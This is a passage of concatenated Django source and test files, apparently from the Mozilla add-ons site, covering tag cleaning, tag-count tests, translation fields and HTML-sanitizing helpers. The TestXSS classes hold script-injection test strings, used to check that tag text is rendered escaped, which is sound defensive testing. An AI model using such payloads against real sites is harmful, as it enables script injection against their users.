        tag2 = Tag(tag_text='swearword', blacklisted=True)
        tag2.save()
        # Both rows exist, but only the non-blacklisted one is exposed.
        eq_(Tag.objects.all().count(), 2)
        eq_(Tag.objects.not_blacklisted().count(), 1)
        eq_(Tag.objects.not_blacklisted()[0], tag1)
class TestManagement(amo.tests.TestCase):
    """Tests for the clean_tag task (tag text normalization / merging)."""
    fixtures = ['base/addon_3615',
                'base/addon_5369',
                'tags/tags.json',
                'base/user_4043307',
                'base/user_2519']
    def setUp(self):
        self.addon = Addon.objects.get(pk=3615)
        self.another = Addon.objects.get(pk=5369)
    def test_clean_tags(self):
        # 'Sun' and ' Sun' both normalize to the existing 'sun', so the
        # total tag count must return to its starting value.
        start = Tag.objects.count()
        caps = Tag.objects.create(tag_text='Sun')
        space = Tag.objects.create(tag_text=' Sun')
        clean_tag(caps.pk)
        clean_tag(space.pk)
        eq_(Tag.objects.count(), start)
        # Just to check another run doesn't make more changes.
        clean_tag(space.pk)
        eq_(Tag.objects.count(), start)
    def test_clean_addons_tags(self):
        space = Tag.objects.create(tag_text=' Sun')
        start = self.addon.tags.count()
        AddonTag.objects.create(tag=space, addon=self.addon)
        AddonTag.objects.create(tag=space, addon=self.another)
        eq_(self.another.tags.count(), 1)
        eq_(self.addon.tags.count(), start + 1)
        for tag in Tag.objects.all():
            clean_tag(tag.pk)
        # There is ' Sun' and 'sun' on addon, one gets deleted.
        eq_(self.addon.tags.count(), start)
        # There is 'sun' on another, should not be deleted.
        eq_(self.another.tags.count(), 1)
    def test_clean_doesnt_delete(self):
        space = Tag.objects.create(tag_text=' Sun')
        start = self.addon.tags.count()
        AddonTag.objects.create(tag=space, addon=self.another)
        eq_(self.another.tags.count(), 1)
        for tag in Tag.objects.all():
            clean_tag(tag.pk)
        # The 'sun' doesn't get deleted.
        eq_(self.addon.tags.count(), start)
        # There is 'sun' on another, should not be deleted.
        eq_(self.another.tags.count(), 1)
    def test_clean_multiple(self):
        # Three garbled variants of each word all collapse into one tag
        # per word after cleaning.
        for tag in ['sun', 'beach', 'sky']:
            caps = tag.upper()
            space = ' %s' % tag
            other = '. %s! ' % tag
            for garbage in [caps, space, other]:
                garbage = Tag.objects.create(tag_text=garbage)
                for addon in (self.addon, self.another):
                    AddonTag.objects.create(tag=garbage, addon=addon)
        for tag in Tag.objects.all():
            clean_tag(tag.pk)
        eq_(self.addon.tags.count(), 5)
        eq_(self.another.tags.count(), 3)
    def setup_blacklisted(self):
        # Helper: a blacklisted duplicate of the existing 'sun' tag.
        self.new = Tag.objects.create(tag_text=' Sun', blacklisted=True)
        self.old = Tag.objects.get(tag_text='sun')
    def test_blacklisted(self):
        # The blacklist flag survives the merge regardless of which tag is
        # cleaned first.
        self.setup_blacklisted()
        clean_tag(self.old.pk)
        assert not Tag.objects.get(tag_text='sun').blacklisted
        clean_tag(self.new.pk)
        assert Tag.objects.get(tag_text='sun').blacklisted
    def test_blacklisted_inverted(self):
        self.setup_blacklisted()
        clean_tag(self.new.pk)
        assert Tag.objects.get(tag_text='sun').blacklisted
        clean_tag(self.old.pk)
        assert Tag.objects.get(tag_text='sun').blacklisted
class TestCount(amo.tests.TestCase):
    """Tests for the denormalized Tag.num_addons bookkeeping."""
    fixtures = ['base/addon_3615',
                'base/addon_5369',
                'tags/tags.json']
    exempt_from_fixture_bundling = True
    def setUp(self):
        self.tag = Tag.objects.get(pk=2652)
    def test_count(self):
        self.tag.update_stat()
        eq_(self.tag.num_addons, 1)
    def test_blacklisted(self):
        # Blacklisted tags keep their stored count even when addons change.
        self.tag.update(blacklisted=True, num_addons=0)
        AddonTag.objects.create(addon_id=5369, tag_id=self.tag.pk)
        eq_(self.tag.reload().num_addons, 0)
    def test_save_tag(self):
        self.tag.save_tag(addon=Addon.objects.get(pk=5369))
        eq_(self.tag.reload().num_addons, 2)
    def test_remove_tag(self):
        self.tag.remove_tag(addon=Addon.objects.get(pk=3615))
        eq_(self.tag.reload().num_addons, 0)
    def test_add_addontag(self):
        # Signal-driven: creating an AddonTag bumps the count.
        AddonTag.objects.create(addon_id=5369, tag_id=self.tag.pk)
        eq_(self.tag.reload().num_addons, 2)
    def test_delete_addontag(self):
        addontag = AddonTag.objects.all()[0]
        tag = addontag.tag
        tag.update_stat()
        eq_(tag.reload().num_addons, 1)
        addontag.delete()
        eq_(tag.reload().num_addons, 0)
    def test_delete_tag(self):
        # Deleting a tag must not be blocked by the stat signals.
        pk = self.tag.pk
        self.tag.update_stat()
        self.tag.delete()
        eq_(Tag.objects.filter(pk=pk).count(), 0)
########NEW FILE########
__FILENAME__ = test_views
from django.core.urlresolvers import reverse, NoReverseMatch
from nose.tools import eq_
from pyquery import PyQuery as pq
import amo.tests
from addons.models import Addon
class TestManagement(amo.tests.TestCase):
    """View-level check that tags render on the add-on detail page."""
    fixtures = ['base/addon_3615',
                'tags/tags.json']
    def test_tags_details_view(self):
        """Test that there are some tags being shown on the details page."""
        url = reverse('addons.detail_more', args=['a3615'])
        r = self.client.get_ajax(url, follow=True)
        doc = pq(r.content)
        eq_(len(doc('li.tag')), 4)
        assert 'Tags' in [d.text for d in doc('h3')]
class TestXSS(amo.tests.TestCase):
    """Markup in tag text must be rendered escaped, never executed."""
    fixtures = ['base/addon_3615',
                'tags/tags.json']
    xss = "<script src='foo.bar'>"
    def setUp(self):
        self.addon = Addon.objects.get(pk=3615)
        self.tag = self.addon.tags.all()[0]
        self.tag.tag_text = self.xss
        self.tag.num_addons = 1
        self.tag.save()
    def test_tags_xss_detail(self):
        """Test xss tag detail."""
        url = reverse('addons.detail_more', args=['a3615'])
        r = self.client.get_ajax(url, follow=True)
        doc = pq(r.content)
        # text_content() returns the *escaped* output decoded, so the raw
        # markup appearing here means it was not injected into the DOM.
        eq_(doc('li.tag')[0].text_content().strip(), self.xss)
    def test_tags_xss_cloud(self):
        """Test xss tag cloud."""
        url = reverse('tags.top_cloud')
        r = self.client.get(url, follow=True)
        doc = pq(r.content)
        eq_(doc('a.tag')[0].text_content().strip(), self.xss)
class TestXSSURLFail(amo.tests.TestCase):
    """Tag texts that cannot form valid URLs must fail reversing safely."""
    fixtures = ['base/addon_3615',
                'tags/tags.json']
    xss = "<script>alert('xss')</script>"
    def setUp(self):
        self.addon = Addon.objects.get(pk=3615)
        self.tag = self.addon.tags.all()[0]
        self.tag.tag_text = self.xss
        self.tag.num_addons = 1
        self.tag.save()
    def test_tags_xss(self):
        """Test xss tag detail."""
        url = reverse('addons.detail_more', args=['a3615'])
        r = self.client.get_ajax(url, follow=True)
        doc = pq(r.content)
        eq_(doc('li.tag')[0].text_content().strip(), self.xss)
    def test_tags_xss_home(self):
        """Test xss tag home."""
        self.assertRaises(NoReverseMatch, reverse,
                          'tags.detail', args=[self.xss])
    def test_tags_xss_cloud(self):
        """Test xss tag cloud."""
        self.assertRaises(NoReverseMatch, reverse,
                          'tags.top_cloud', args=[self.xss])
    def test_no_reverse(self):
        # Tag.can_reverse() mirrors the NoReverseMatch behavior above.
        assert not self.tag.can_reverse()
class TestNoTags(amo.tests.TestCase):
    """Detail page omits the Tags section when the add-on has no tags."""
    fixtures = ['base/addon_3615']
    def test_tags_no_details_view(self):
        """Test that there is no tag header tags being shown."""
        url = reverse('addons.detail', args=['a3615'])
        r = self.client.get(url, follow=True)
        doc = pq(r.content)
        assert 'Tags' not in [d.text for d in doc('h3')]
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import patterns, url
from . import views
# Single public URL for the tags app: the "top tags" cloud page.
urlpatterns = patterns('',
    url('^tags/top$', views.top_cloud, name='tags.top_cloud'),
)
########NEW FILE########
__FILENAME__ = views
from django.shortcuts import render
from tags.models import Tag
def top_cloud(request, num_tags=100):
    """Display the (roughly) ``num_tags`` most used tags.

    TODO(skeen): take request.APP.id into account; first attempts to do
    so resulted in extreme SQL carnage, bug 556135 is open to fix.
    """
    # Fix: the TODO text above used to be a *second* bare triple-quoted
    # string after the docstring -- a no-op expression statement that never
    # became part of the function's documentation.  Folded into one
    # docstring.
    top_tags = Tag.objects.not_blacklisted().order_by('-num_addons')[:num_tags]
    return render(request, 'tags/top_cloud.html', {'top_tags': top_tags})
########NEW FILE########
__FILENAME__ = fields
from django import forms
from django.conf import settings
from django.db import models
from django.db.models.fields import related
from django.utils import translation as translation_utils
from django.utils.translation.trans_real import to_language
from .hold import add_translation, make_key, save_translations
from .models import (Translation, PurifiedTranslation, LinkifiedTranslation,
NoLinksTranslation, NoLinksNoMarkupTranslation)
from .widgets import TransInput, TransTextarea
class TranslatedField(models.ForeignKey):
    """
    A foreign key to the translations table.

    If require_locale=False, the fallback join will not use a locale. Instead,
    we will look for 1) a translation in the current locale and 2) fallback
    with any translation matching the foreign key.
    """
    # Translation subclass this field points at; overridden by subclasses.
    to = Translation
    def __init__(self, **kwargs):
        # to_field: The field on the related object that the relation is to.
        # Django wants to default to translations.autoid, but we need id.
        options = dict(null=True, to_field='id', unique=True, blank=True,
                       on_delete=models.SET_NULL)
        kwargs.update(options)
        # short selects a single-line widget (TransInput) in formfield().
        self.short = kwargs.pop('short', True)
        self.require_locale = kwargs.pop('require_locale', True)
        super(TranslatedField, self).__init__(self.to, **kwargs)
    @property
    def db_column(self):
        # Django wants to call the db_column ('%s_id' % self.name), but our
        # translations foreign keys aren't set up that way.
        return self._db_column if hasattr(self, '_db_column') else self.name
    @db_column.setter
    def db_column(self, value):
        # Django sets db_column=None to initialize it. I don't think anyone
        # would set the db_column otherwise.
        if value is not None:
            self._db_column = value
    def contribute_to_class(self, cls, name):
        """Add this Translation to ``cls._meta.translated_fields``."""
        super(TranslatedField, self).contribute_to_class(cls, name)
        # Add self to the list of translated fields.
        if hasattr(cls._meta, 'translated_fields'):
            cls._meta.translated_fields.append(self)
        else:
            cls._meta.translated_fields = [self]
        # Set up a unique related name. The + means it's hidden.
        self.rel.related_name = '%s_%s_set+' % (cls.__name__, name)
        # Replace the normal descriptor with our custom descriptor.
        setattr(cls, self.name, TranslationDescriptor(self))
    def formfield(self, **kw):
        """Return a TransField form field with the appropriate widget."""
        widget = TransInput if self.short else TransTextarea
        defaults = {'form_class': TransField, 'widget': widget}
        defaults.update(kw)
        return super(TranslatedField, self).formfield(**defaults)
    def validate(self, value, model_instance):
        # Skip ForeignKey.validate since that expects only one Translation when
        # doing .get(id=id)
        return models.Field.validate(self, value, model_instance)
# Concrete TranslatedField variants: each points at the Translation
# subclass that applies the corresponding sanitization when rendered.
class PurifiedField(TranslatedField):
    to = PurifiedTranslation
class LinkifiedField(TranslatedField):
    to = LinkifiedTranslation
class NoLinksField(TranslatedField):
    to = NoLinksTranslation
class NoLinksNoMarkupField(TranslatedField):
    to = NoLinksNoMarkupTranslation
def switch(obj, new_model):
    """Switch between Translation and Purified/Linkified Translations.

    Copies every field declared on ``new_model`` from ``obj`` into a new
    (unsaved) ``new_model`` instance.
    """
    attrs = {}
    for field in new_model._meta.fields:
        attrs[field.name] = getattr(obj, field.name)
    return new_model(**attrs)
def save_on_signal(obj, trans):
    """Connect signals so the translation gets saved during obj.save()."""
    signal = models.signals.pre_save
    def cb(sender, instance, **kw):
        # Only fire for the exact instance we registered for, then detach
        # so the callback runs at most once.
        if instance is obj:
            # Insert vs. update depends on whether the translation row
            # already has its autoid primary key.
            is_new = trans.autoid is None
            trans.save(force_insert=is_new, force_update=not is_new)
            signal.disconnect(cb)
    signal.connect(cb, sender=obj.__class__, weak=False)
class TranslationDescriptor(related.ReverseSingleRelatedObjectDescriptor):
    """
    Descriptor that handles creating and updating Translations given strings.
    """
    def __init__(self, field):
        super(TranslationDescriptor, self).__init__(field)
        self.model = field.rel.to
    def __get__(self, instance, instance_type=None):
        if instance is None:
            return self
        # If Django doesn't find find the value in the cache (which would only
        # happen if the field was set or accessed already), it does a db query
        # to follow the foreign key. We expect translations to be set by
        # queryset transforms, so doing a query is the wrong thing here.
        try:
            return getattr(instance, self.field.get_cache_name())
        except AttributeError:
            return None
    def __set__(self, instance, value):
        # Accepts a plain string (current language), a {locale: string}
        # mapping, or an existing Translation instance.
        lang = translation_utils.get_language()
        if isinstance(value, basestring):
            value = self.translation_from_string(instance, lang, value)
        elif hasattr(value, 'items'):
            value = self.translation_from_dict(instance, lang, value)
        # Don't let this be set to None, because Django will then blank out the
        # foreign key for this object. That's incorrect for translations.
        if value is not None:
            # We always get these back from the database as Translations, but
            # we may want them to be a more specific Purified/Linkified child
            # class.
            if not isinstance(value, self.model):
                value = switch(value, self.model)
            super(TranslationDescriptor, self).__set__(instance, value)
        elif getattr(instance, self.field.attname, None) is None:
            super(TranslationDescriptor, self).__set__(instance, None)
    def translation_from_string(self, instance, lang, string):
        """Create, save, and return a Translation from a string."""
        try:
            trans = getattr(instance, self.field.name)
            trans_id = getattr(instance, self.field.attname)
            if trans is None and trans_id is not None:
                # This locale doesn't have a translation set, but there are
                # translations in another locale, so we have an id already.
                translation = self.model.new(string, lang, id=trans_id)
            elif to_language(trans.locale) == lang.lower():
                # Replace the translation in the current language.
                trans.localized_string = string
                translation = trans
            else:
                # We already have a translation in a different language.
                translation = self.model.new(string, lang, id=trans.id)
        except AttributeError:
            # Create a brand new translation.
            translation = self.model.new(string, lang)
        # A new translation has been created and it might need to be saved.
        # This adds the translation to the queue of translation that need
        # to be saved for this instance.
        add_translation(make_key(instance), translation)
        return translation
    def translation_from_dict(self, instance, lang, dict_):
        """
        Create Translations from a {'locale': 'string'} mapping.
        If one of the locales matches lang, that Translation will be returned.
        """
        from amo.utils import to_language as amo_to_language
        rv = None
        for locale, string in dict_.items():
            loc = amo_to_language(locale)
            # Silently skip locales the site doesn't support.
            if loc not in settings.AMO_LANGUAGES + settings.HIDDEN_LANGUAGES:
                continue
            # The Translation is created and saved in here.
            trans = self.translation_from_string(instance, locale, string)
            # Set the Translation on the object because translation_from_string
            # doesn't expect Translations to be created but not attached.
            self.__set__(instance, trans)
            # If we're setting the current locale, set it to the object so
            # callers see the expected effect.
            if to_language(locale) == lang:
                rv = trans
        return rv
class _TransField(object):
    """Mixin that makes a form field accept {locale: value} mappings.

    Validation runs per locale; only the default locale is subject to the
    ``required`` validator (see TransField below).  Written for Python 2
    (``except X, e`` syntax).
    """
    def __init__(self, *args, **kwargs):
        self.default_locale = settings.LANGUAGE_CODE
        # These ModelChoiceField kwargs don't apply to a multi-locale char
        # field, so drop them if a ModelForm passes them in.
        for k in ('queryset', 'to_field_name'):
            if k in kwargs:
                del kwargs[k]
        self.widget = kwargs.pop('widget', TransInput)
        super(_TransField, self).__init__(*args, **kwargs)
    def clean(self, value):
        """Validate a {locale: string} dict; collect errors per locale."""
        errors = LocaleList()
        value = dict((k, v.strip() if v else v) for (k, v) in value.items())
        # Raise an exception if the default locale is required and not present
        if self.default_locale.lower() not in value:
            value[self.default_locale.lower()] = None
        # Now, loop through them and validate them separately.
        for locale, val in value.items():
            try:
                # Only the default locale can be required; all non-default
                # fields are automatically optional.
                if self.default_locale.lower() == locale:
                    super(_TransField, self).validate(val)
                super(_TransField, self).run_validators(val)
            except forms.ValidationError, e:
                errors.extend(e.messages, locale)
        if errors:
            raise LocaleValidationError(errors)
        return value
    def _has_changed(self, initial, data):
        # This used to be called on the field's widget and always returned False!
        return False
class LocaleValidationError(forms.ValidationError):
    """ValidationError whose messages are (locale, error) pairs.

    NOTE(review): deliberately skips super().__init__ and stores the
    LocaleList as-is so ``messages`` preserves locale pairing; ``code``
    and ``params`` are accepted for signature compatibility but ignored
    -- confirm that is intended.
    """
    def __init__(self, messages, code=None, params=None):
        self.msgs = messages
    @property
    def messages(self):
        return self.msgs
class TransField(_TransField, forms.CharField):
    """
    A CharField subclass that can deal with multiple locales.

    Most validators are run over the data for each locale. The required
    validator is only run on the default_locale, which is hooked up to the
    instance with TranslationFormMixin.
    """
    @staticmethod
    def adapt(cls, opts=None):
        """Get a new TransField that subclasses cls instead of CharField.

        :param cls: the form-field class to mix _TransField into.
        :param opts: optional extra class attributes for the new type.
        """
        # Avoid a mutable default argument ({}): each call now gets its own
        # dict, so generated classes can never share a namespace object.
        return type('Trans%s' % cls.__name__, (_TransField, cls), opts or {})
# Subclass dict so Django's isinstance checks treat this as a mapping
# type (historical comment said "list" -- the base really is dict).
class LocaleList(dict):
    """
    List-like object that pairs every element with a locale.

    >>> LocaleList([1, 2], 'en')
    [1, 2]
    ['en', 'en']

    Useful for validation error lists where each error must be associated
    with the locale it came from.  Iterating yields (locale, item) pairs.
    """
    def __init__(self, seq=None, locale=None):
        self.seq = []
        self.locales = []
        if seq:
            assert seq and locale
            self.extend(seq, locale)
    def __iter__(self):
        return iter(self.zip())
    def extend(self, seq, locale):
        """Append every item of ``seq``, tagging each with ``locale``."""
        for item in seq:
            self.seq.append(item)
            self.locales.append(locale)
    def __nonzero__(self):  # py2 truthiness: non-empty when seq is non-empty
        return bool(self.seq)
    def __contains__(self, item):
        return item in self.seq
    def zip(self):
        return zip(self.locales, self.seq)
def save_signal(sender, instance, **kw):
    """
    Use this signal on a model to iterate through all the translations added
    to the hold queue and save them all. Hook this up to the pre_save signal
    on the model.
    """
    if kw.get('raw'):
        # Raw (fixture) saves must not touch the translation queue.
        return
    save_translations(make_key(instance))
########NEW FILE########
__FILENAME__ = forms
from django.conf import settings
from django.db import models
from django.forms.util import ErrorList
from django.utils.translation.trans_real import to_language
from django.utils.encoding import force_unicode
from django.utils.safestring import mark_safe
from django.utils.html import conditional_escape
def default_locale(obj):
    """Get obj's default locale."""
    if not hasattr(obj, 'get_fallback'):
        # No per-object fallback: the site-wide language wins.
        return settings.LANGUAGE_CODE
    fallback = obj.get_fallback()
    if isinstance(fallback, models.Field):
        # get_fallback() returned the Field that *stores* the locale;
        # read the actual value off the instance.
        fallback = getattr(obj, fallback.name)
    return fallback
class TranslationFormMixin(object):
    """
    A mixin for forms with translations that tells fields about the object's
    default locale.
    """

    def __init__(self, *args, **kw):
        super(TranslationFormMixin, self).__init__(*args, **kw)
        self.error_class = self.error_class_
        self.set_default_locale()

    def set_default_locale(self):
        """Push the instance's default locale onto every field + widget."""
        locale = to_language(default_locale(self.instance))
        for field in self.fields.values():
            field.default_locale = field.widget.default_locale = locale

    def full_clean(self):
        # The instance may have changed since __init__; re-sync locales
        # before validation runs.
        self.set_default_locale()
        return super(TranslationFormMixin, self).full_clean()

    def error_class_(self, *a, **k):
        # Locale-aware error list so errors can be tagged with their locale.
        return LocaleErrorList(*a, **k)
class LocaleErrorList(ErrorList):
    """An ErrorList that understands (locale, error) pairs."""

    def _errors(self):
        # Strip the locale off of any (locale, error) pair.
        for item in self:
            yield item[1] if isinstance(item, tuple) else item

    def __contains__(self, value):
        return value in self._errors()

    def as_ul(self):
        if not self:
            return u''
        items = []
        for item in self:
            if isinstance(item, tuple):
                # Tag the <li> with the locale the error belongs to.
                extra = ' data-lang="%s"' % item[0]
                e = item[1]
            else:
                extra, e = '', item
            items.append(u'<li%s>%s</li>' %
                         (extra, conditional_escape(force_unicode(e))))
        return mark_safe('<ul class="errorlist">%s</ul>' % ''.join(items))
########NEW FILE########
__FILENAME__ = helpers
import re
from django.conf import settings
from django.utils import translation
from django.utils.translation.trans_real import to_language
from django.utils.encoding import smart_unicode
import bleach
import jinja2
import jingo
from amo.utils import clean_nl
# Expose Django's to_language() directly as a template filter.
jingo.register.filter(to_language)
@jingo.register.filter
def locale_html(translatedfield):
    """HTML attributes for languages different than the site language"""
    if not translatedfield:
        return ''

    site_locale = translation.to_locale(translation.get_language())
    locale = translation.to_locale(translatedfield.locale)
    if locale == site_locale:
        # Same language as the site: no extra attributes needed.
        return ''
    rtl_locales = [translation.to_locale(l) for l in settings.RTL_LANGUAGES]
    textdir = 'rtl' if locale in rtl_locales else 'ltr'
    # Escape the locale: it may originate from user-controlled data.
    return jinja2.Markup(' lang="%s" dir="%s"' %
                         (jinja2.escape(translatedfield.locale), textdir))
@jingo.register.filter
def truncate(s, length=255, killwords=True, end='...'):
    """
    Wrapper for jinja's truncate that checks if the object has a
    __truncate__ attribute first.

    Altering the jinja2 default of killwords=False because of
    https://bugzilla.mozilla.org/show_bug.cgi?id=624642, which could occur
    elsewhere.
    """
    if s is None:
        return ''
    truncator = getattr(s, '__truncate__', None)
    if truncator is not None:
        # The object knows how to truncate itself (e.g. safely for HTML).
        return truncator(length, killwords, end)
    return jinja2.filters.do_truncate(smart_unicode(s), length, killwords, end)
@jingo.register.inclusion_tag('translations/trans-menu.html')
@jinja2.contextfunction
def l10n_menu(context, default_locale='en-us', remove_locale_url=''):
    """Generates the locale menu for zamboni l10n."""
    default_locale = default_locale.lower()
    languages = dict((code.lower(), name)
                     for code, name in settings.LANGUAGES.items())
    c = dict(context.items())
    if 'addon' in c:
        # An addon in context knows its own remove-locale URL; prefer it.
        remove_locale_url = c['addon'].get_dev_url('remove-locale')
    c.update(languages=languages, default_locale=default_locale,
             remove_locale_url=remove_locale_url)
    return c
@jingo.register.filter
def all_locales(addon, field_name, nl2br=False, prettify_empty=False):
    """Render every stored locale of addon.field_name as HTML."""
    field = getattr(addon, field_name, None)
    if not addon or field is None:
        return
    # All sibling rows sharing this translation id that actually hold text.
    trans = field.__class__.objects.filter(id=field.id,
                                           localized_string__isnull=False)
    template = jingo.env.get_template('translations/all-locales.html')
    context = dict(addon=addon, field=field, field_name=field_name,
                   translations=trans, nl2br=nl2br,
                   prettify_empty=prettify_empty)
    return jinja2.Markup(template.render(context))
@jingo.register.filter
def clean(string):
    """Bleach the string, collapse extra newlines and mark the result safe."""
    cleaned = bleach.clean(unicode(string))
    return jinja2.Markup(clean_nl(cleaned).strip())
# TODO (magopian): remove this and use Django1.6 django.utils.html.remove_tags
def remove_tags(html, tags):
    """Returns the given HTML with given tags removed.

    ``remove_tags`` is different from ``django.utils.html.strip_tags`` which
    removes each and every html tags found.

    ``tags`` is a space separated string of (case sensitive) tags to remove.

    This is backported from Django1.6:
    https://docs.djangoproject.com/en/1.6/ref/utils/
    """
    alternatives = '(%s)' % '|'.join(re.escape(tag) for tag in tags.split())
    # Opening tags: "<tag>", "<tag/>" or "<tag attr=...>".
    opening_re = re.compile(r'<%s(/?>|(\s+[^>]*>))' % alternatives, re.U)
    closing_re = re.compile('</%s>' % alternatives)
    html = opening_re.sub('', html)
    return closing_re.sub('', html)
@jingo.register.filter
def no_links(string):
    """Leave text links untouched, keep only inner text on URLs."""
    if not string:
        return string
    if hasattr(string, '__html__'):
        # Already-safe markup objects render to their HTML form first.
        string = string.__html__()
    # Strip both cases of the anchor tag; the inner text survives.
    stripped = remove_tags(string, 'a A')
    return jinja2.Markup(clean_nl(stripped).strip())
########NEW FILE########
__FILENAME__ = hold
from threading import local
from django.core.signals import request_finished
_to_save = local()
def add_translation(key, translation):
    """
    Queue a translation that needs to be saved for a particular object. To
    generate the key, call make_key.
    """
    if not hasattr(_to_save, 'translations'):
        _to_save.translations = {}
    # setdefault returns the (possibly freshly created) list, so a single
    # lookup replaces the previous setdefault-then-index double lookup.
    _to_save.translations.setdefault(key, []).append(translation)
def clean_translations(sender, **kwargs):
    """
    Removes all translations in the queue.

    Connected to request_finished below so unsaved translations never leak
    across requests on the same thread.
    """
    if hasattr(_to_save, 'translations'):
        _to_save.translations = {}
def make_key(obj):
    """Returns a key for this object."""
    # Identity-based: distinct live instances can never collide.
    return id(obj)
def save_translations(key):
    """
    For a given key, save all the translations. The key is used to ensure that
    we only save the translations for the given object (and not all of them).
    Once saved, they will be deleted.
    """
    queued = getattr(_to_save, 'translations', None)
    if queued is None:
        return

    for trans in queued.get(key, []):
        # A missing autoid means the row has never been INSERTed.
        is_new = trans.autoid is None
        trans.save(force_insert=is_new, force_update=not is_new)

    queued.pop(key, None)
# Ensure that on request completion, we flush out any unsaved translations.
# The dispatch_uid guards against duplicate registration on repeated imports.
request_finished.connect(clean_translations, dispatch_uid='clean_translations')
########NEW FILE########
__FILENAME__ = models
from django.db import connections, models, router
from django.db.models.deletion import Collector
from django.utils import encoding
import bleach
import commonware.log
import amo
import amo.models
from amo import urlresolvers
from . import utils
log = commonware.log.getLogger('z.translations')
class TranslationManager(amo.models.ManagerBase):

    def remove_for(self, obj, locale):
        """Remove a locale for the given object."""
        ids = [getattr(obj, field.attname)
               for field in obj._meta.translated_fields]
        # NULL out the strings rather than deleting the rows outright.
        (Translation.objects
         .filter(id__in=[pk for pk in ids if pk], locale=locale)
         .update(localized_string=None, localized_string_clean=None))
class Translation(amo.models.ModelBase):
    """
    Translation model.

    Use :class:`translations.fields.TranslatedField` instead of a plain foreign
    key to this model.
    """
    # autoid is the real surrogate PK; several rows (one per locale)
    # deliberately share the same `id`.
    autoid = models.AutoField(primary_key=True)
    id = models.IntegerField()
    locale = models.CharField(max_length=10)
    localized_string = models.TextField(null=True)
    localized_string_clean = models.TextField(null=True)

    objects = TranslationManager()

    class Meta:
        db_table = 'translations'
        unique_together = ('id', 'locale')

    def __unicode__(self):
        return self.localized_string and unicode(self.localized_string) or ''

    def __nonzero__(self):
        # __nonzero__ is called to evaluate an object in a boolean context. We
        # want Translations to be falsy if their string is empty.
        return (bool(self.localized_string) and
                bool(self.localized_string.strip()))

    def __eq__(self, other):
        # Django implements an __eq__ that only checks pks. We need to check
        # the strings if we're dealing with existing vs. unsaved Translations.
        return self.__cmp__(other) == 0

    def __cmp__(self, other):
        # Compare against another Translation or against a plain string.
        if hasattr(other, 'localized_string'):
            return cmp(self.localized_string, other.localized_string)
        else:
            return cmp(self.localized_string, other)

    def clean(self):
        # Normalize surrounding whitespace before hitting the database.
        if self.localized_string:
            self.localized_string = self.localized_string.strip()

    def save(self, **kwargs):
        self.clean()
        return super(Translation, self).save(**kwargs)

    def delete(self, using=None):
        # FIXME: if the Translation is the one used as default/fallback,
        # then deleting it will mean the corresponding field on the related
        # model will stay empty even if there are translations in other
        # languages!
        cls = self.__class__
        using = using or router.db_for_write(cls, instance=self)
        # Look for all translations for the same string (id=self.id) except the
        # current one (autoid=self.autoid).
        qs = cls.objects.filter(id=self.id).exclude(autoid=self.autoid)
        if qs.using(using).exists():
            # If other Translations for the same id exist, we just need to
            # delete this one and *only* this one, without letting Django
            # collect dependencies (it'd remove the others, which we want to
            # keep).
            assert self._get_pk_val() is not None
            collector = Collector(using=using)
            collector.collect([self], collect_related=False)
            # In addition, because we have FK pointing to a non-unique column,
            # we need to force MySQL to ignore constraints because it's dumb
            # and would otherwise complain even if there are remaining rows
            # that matches the FK.
            with connections[using].constraint_checks_disabled():
                collector.delete()
        else:
            # If no other Translations with that id exist, then we should let
            # django behave normally. It should find the related model and set
            # the FKs to NULL.
            return super(Translation, self).delete(using=using)
    delete.alters_data = True

    @classmethod
    def _cache_key(cls, pk, db):
        # Hard-coding the class name here so that subclasses don't try to cache
        # themselves under something like "o:translations.purifiedtranslation".
        #
        # Like in ModelBase, we avoid putting the real db in the key because it
        # does us more harm than good.
        key_parts = ('o', 'translations.translation', pk, 'default')
        return ':'.join(map(encoding.smart_unicode, key_parts))

    @classmethod
    def new(cls, string, locale, id=None):
        """
        Jumps through all the right hoops to create a new translation.

        If ``id`` is not given a new id will be created using
        ``translations_seq``. Otherwise, the id will be used to add strings to
        an existing translation.

        To increment IDs we use a setting on MySQL. This is to support multiple
        database masters -- it's just crazy enough to work! See bug 756242.
        """
        if id is None:
            # Get a sequence key for the new translation.
            cursor = connections['default'].cursor()
            cursor.execute("""UPDATE translations_seq
                              SET id=LAST_INSERT_ID(id + @@global.auto_increment_increment)""")
            # The sequence table should never be empty. But alas, if it is,
            # let's fix it.
            if not cursor.rowcount > 0:
                cursor.execute("""INSERT INTO translations_seq (id)
                                  VALUES(LAST_INSERT_ID(id + @@global.auto_increment_increment))""")
            cursor.execute('SELECT LAST_INSERT_ID()')
            id = cursor.fetchone()[0]

        # Update if one exists, otherwise create a new one.
        q = {'id': id, 'locale': locale}
        try:
            trans = cls.objects.get(**q)
            trans.localized_string = string
        except cls.DoesNotExist:
            trans = cls(localized_string=string, **q)

        return trans
class PurifiedTranslation(Translation):
    """Run the string through bleach to get a safe version."""
    allowed_tags = [
        'a',
        'abbr',
        'acronym',
        'b',
        'blockquote',
        'code',
        'em',
        'i',
        'li',
        'ol',
        'strong',
        'ul',
    ]
    allowed_attributes = {
        'a': ['href', 'title', 'rel'],
        'abbr': ['title'],
        'acronym': ['title'],
    }

    class Meta:
        proxy = True

    def __unicode__(self):
        # Compute the cleaned variant lazily, the first time it's needed.
        if not self.localized_string_clean:
            self.clean()
        return unicode(self.localized_string_clean)

    def __html__(self):
        # Jinja2 markup protocol: we are already safe once cleaned.
        return unicode(self)

    def __truncate__(self, length, killwords, end):
        return utils.truncate(unicode(self), length, killwords, end)

    def clean(self):
        from amo.utils import clean_nl
        super(PurifiedTranslation, self).clean()
        self.localized_string_clean = clean_nl(
            self.clean_localized_string()).strip()

    def clean_localized_string(self):
        # All links (text and markup) are normalized.
        linkified = urlresolvers.linkify_with_outgoing(self.localized_string)
        # Keep only the allowed tags and attributes, escape the rest.
        return bleach.clean(linkified, tags=self.allowed_tags,
                            attributes=self.allowed_attributes)
class LinkifiedTranslation(PurifiedTranslation):
    """Run the string through bleach to get a linkified version."""
    # Only anchors survive cleaning; every other tag gets escaped.
    allowed_tags = ['a']

    class Meta:
        proxy = True
class NoLinksMixin(object):
    """Mixin used to remove links (URLs and text) from localized_string."""

    def clean_localized_string(self):
        # Pass 1: regular cleaning; links are left alone.
        cleaned = super(NoLinksMixin, self).clean_localized_string()
        # Pass 2: blank out the inner text of every link.
        emptied = bleach.linkify(
            cleaned, callbacks=[lambda attrs, new: {'_text': ''}])
        # Pass 3: strip the (now empty) anchor tags themselves.  Other
        # forbidden tags were already escaped in pass 1, so only anchors go.
        tags = [tag for tag in self.allowed_tags if tag != 'a']
